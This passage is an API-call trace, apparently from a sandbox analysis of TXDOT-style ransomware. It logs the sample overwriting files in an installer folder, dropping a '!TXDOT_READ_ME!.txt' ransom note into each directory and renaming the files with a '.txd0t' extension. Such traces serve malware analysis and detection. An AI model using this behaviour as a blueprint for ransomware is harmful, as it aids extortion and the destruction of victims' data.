dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.265] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0xf10, lpOverlapped=0x0) returned 1 [0086.265] FlushFileBuffers (hFile=0x468) returned 1 [0086.271] GetProcessHeap () returned 0xe30000 [0086.272] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0086.272] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" [0086.272] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf") returned="eula.rtf" [0086.272] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.272] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1053\\!TXDOT_READ_ME!.txt") returned 0 [0086.272] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1053\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0086.274] WriteFile (in: hFile=0x460, lpBuffer=0x37ff484*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x37ff484*, lpNumberOfBytesWritten=0x37ff480*=0x2, lpOverlapped=0x0) returned 1 [0086.275] FlushFileBuffers (hFile=0x460) returned 1 [0086.281] WriteFile (in: hFile=0x460, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff480*=0x7f0, lpOverlapped=0x0) returned 1 [0086.281] FlushFileBuffers (hFile=0x460) returned 1 [0086.286] CloseHandle (hObject=0x460) returned 1 [0086.286] GetProcessHeap () returned 0xe30000 [0086.286] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0086.286] CloseHandle (hObject=0x468) returned 1 [0086.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.txd0t")) returned 1 [0086.287] SetEvent (hEvent=0x3f8) returned 1 [0086.287] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0086.288] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" [0086.288] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf.txd0t" [0086.288] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf.txd0t") returned 0 [0086.288] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf", dwFileAttributes=0x80) returned 1 [0086.288] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0086.288] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=3859) returned 1 [0086.288] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.288] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0086.427] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffeeed, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.427] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xf10, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0xf10, lpOverlapped=0x0) returned 1 [0086.427] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffff0f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.427] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0xf10, lpOverlapped=0x0) returned 1 [0086.428] FlushFileBuffers (hFile=0x468) returned 1 [0086.438] GetProcessHeap () returned 0xe30000 [0086.438] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0086.438] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" [0086.438] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf") returned="eula.rtf" [0086.438] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.438] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1055\\!TXDOT_READ_ME!.txt") returned 0 [0086.438] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1055\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0086.444] WriteFile (in: hFile=0x46c, lpBuffer=0x37ff484*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x37ff484*, lpNumberOfBytesWritten=0x37ff480*=0x2, lpOverlapped=0x0) returned 1 [0086.445] FlushFileBuffers (hFile=0x46c) returned 1 [0086.478] WriteFile (in: hFile=0x46c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff480*=0x7f0, lpOverlapped=0x0) returned 1 [0086.479] FlushFileBuffers (hFile=0x46c) returned 1 [0086.480] CloseHandle (hObject=0x46c) returned 1 [0086.480] GetProcessHeap () returned 0xe30000 [0086.481] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0086.481] CloseHandle (hObject=0x468) returned 1 [0086.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf.txd0t")) returned 1 [0086.481] SetEvent (hEvent=0x3f8) returned 1 [0086.481] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0086.484] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" [0086.485] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.txd0t" [0086.485] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.txd0t") returned 0 [0086.485] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0086.485] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0086.485] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=60684) returned 1 [0086.485] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.485] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0086.487] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff10f4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.487] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xed00, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0xed00, lpOverlapped=0x0) returned 1 [0086.558] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff1300, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.558] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xed00, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0xed00, lpOverlapped=0x0) returned 1 [0086.558] FlushFileBuffers (hFile=0x468) returned 1 [0086.660] GetProcessHeap () returned 0xe30000 [0086.660] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe41328 [0086.660] StrCpyW (in: psz1=0xe41328, psz2="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" [0086.660] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned="LocalizedData.xml" [0086.660] StrCpyW (in: psz1=0xe41366, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.660] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2052\\!TXDOT_READ_ME!.txt") returned 0 [0086.660] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\2052\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0086.665] WriteFile (in: hFile=0x478, lpBuffer=0x37ff474*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x37ff474*, lpNumberOfBytesWritten=0x37ff470*=0x2, lpOverlapped=0x0) returned 1 [0086.666] FlushFileBuffers (hFile=0x478) returned 1 [0086.737] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff470*=0x7f0, lpOverlapped=0x0) returned 1 [0086.739] FlushFileBuffers (hFile=0x478) returned 1 [0086.747] CloseHandle (hObject=0x478) returned 1 [0086.747] GetProcessHeap () returned 0xe30000 [0086.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe41328 | out: hHeap=0xe30000) returned 1 [0086.749] CloseHandle (hObject=0x468) returned 1 [0086.749] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.txd0t")) returned 1 [0086.749] SetEvent (hEvent=0x3f8) returned 1 [0086.749] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0086.754] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" [0086.754] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.txd0t" [0086.754] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.txd0t") returned 0 [0086.772] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0086.776] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0086.776] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=79996) returned 1 [0086.776] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.776] WriteFile (in: hFile=0x46c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0086.778] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffec584, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.778] ReadFile (in: hFile=0x46c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x13870, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x13870, lpOverlapped=0x0) returned 1 [0086.783] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffec790, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.783] WriteFile (in: hFile=0x46c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x13870, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x13870, lpOverlapped=0x0) returned 1 [0086.783] FlushFileBuffers (hFile=0x46c) returned 1 [0086.879] GetProcessHeap () returned 0xe30000 [0086.879] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0086.879] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" [0086.879] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned="LocalizedData.xml" [0086.880] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.880] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\3082\\!TXDOT_READ_ME!.txt") returned 1 [0086.880] GetProcessHeap () returned 0xe30000 [0086.880] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0086.880] CloseHandle (hObject=0x46c) returned 1 [0086.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml.txd0t")) returned 1 [0086.880] SetEvent (hEvent=0x3f8) returned 1 [0086.880] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0086.884] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" [0086.884] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.txd0t" [0086.884] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.txd0t") returned 0 [0086.884] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml", dwFileAttributes=0x80) returned 1 [0086.884] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0086.884] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=93314) returned 1 [0086.884] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.884] WriteFile (in: hFile=0x464, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0086.903] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffe917e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.903] ReadFile (in: hFile=0x464, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x16c80, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x16c80, lpOverlapped=0x0) returned 1 [0086.915] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffe9380, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.915] WriteFile (in: hFile=0x464, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x16c80, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x16c80, lpOverlapped=0x0) returned 1 [0086.916] FlushFileBuffers (hFile=0x464) returned 1 [0086.959] GetProcessHeap () returned 0xe30000 [0086.959] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xed2e18 [0086.959] StrCpyW (in: psz1=0xed2e18, psz2="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" [0086.959] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned="Parameterinfo.xml" [0086.959] StrCpyW (in: psz1=0xed2e5e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.959] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\Extended\\!TXDOT_READ_ME!.txt") returned 0 [0086.959] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\extended\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0086.961] WriteFile (in: hFile=0x46c, lpBuffer=0x37ff474*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x37ff474*, lpNumberOfBytesWritten=0x37ff470*=0x2, lpOverlapped=0x0) returned 1 [0086.963] FlushFileBuffers (hFile=0x46c) returned 1 [0087.006] WriteFile (in: hFile=0x46c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff470*=0x7f0, lpOverlapped=0x0) returned 1 [0087.029] FlushFileBuffers (hFile=0x46c) returned 1 [0087.032] CloseHandle (hObject=0x46c) returned 1 [0087.033] GetProcessHeap () returned 0xe30000 [0087.033] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2e18 | out: hHeap=0xe30000) returned 1 [0087.033] CloseHandle (hObject=0x464) returned 1 [0087.033] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml.txd0t")) returned 1 [0087.033] SetEvent (hEvent=0x3f8) returned 1 [0087.033] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0087.047] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" [0087.047] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi.txd0t" [0087.047] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi.txd0t") returned 0 [0087.047] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi", dwFileAttributes=0x80) returned 1 [0087.076] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0087.076] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=1163264) returned 1 [0087.077] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.077] WriteFile (in: hFile=0x464, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0087.078] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffee3e00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.078] ReadFile (in: hFile=0x464, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x100000, lpOverlapped=0x0) returned 1 [0087.112] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.112] WriteFile (in: hFile=0x464, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x100000, lpOverlapped=0x0) returned 1 [0087.115] FlushFileBuffers (hFile=0x464) returned 1 [0087.444] GetProcessHeap () returned 0xe30000 [0087.444] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x100) returned 0xecf390 [0087.444] StrCpyW (in: psz1=0xecf390, psz2="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" [0087.444] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned="netfx_Core_x86.msi" [0087.444] StrCpyW (in: psz1=0xecf3c4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.444] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0087.444] GetProcessHeap () returned 0xe30000 [0087.445] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf390 | out: hHeap=0xe30000) returned 1 [0087.445] CloseHandle (hObject=0x464) returned 1 [0087.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi.txd0t" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi.txd0t")) returned 1 [0087.446] SetEvent (hEvent=0x3f8) returned 1 [0087.448] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0087.448] StrCpyW (in: psz1=0x37ff480, 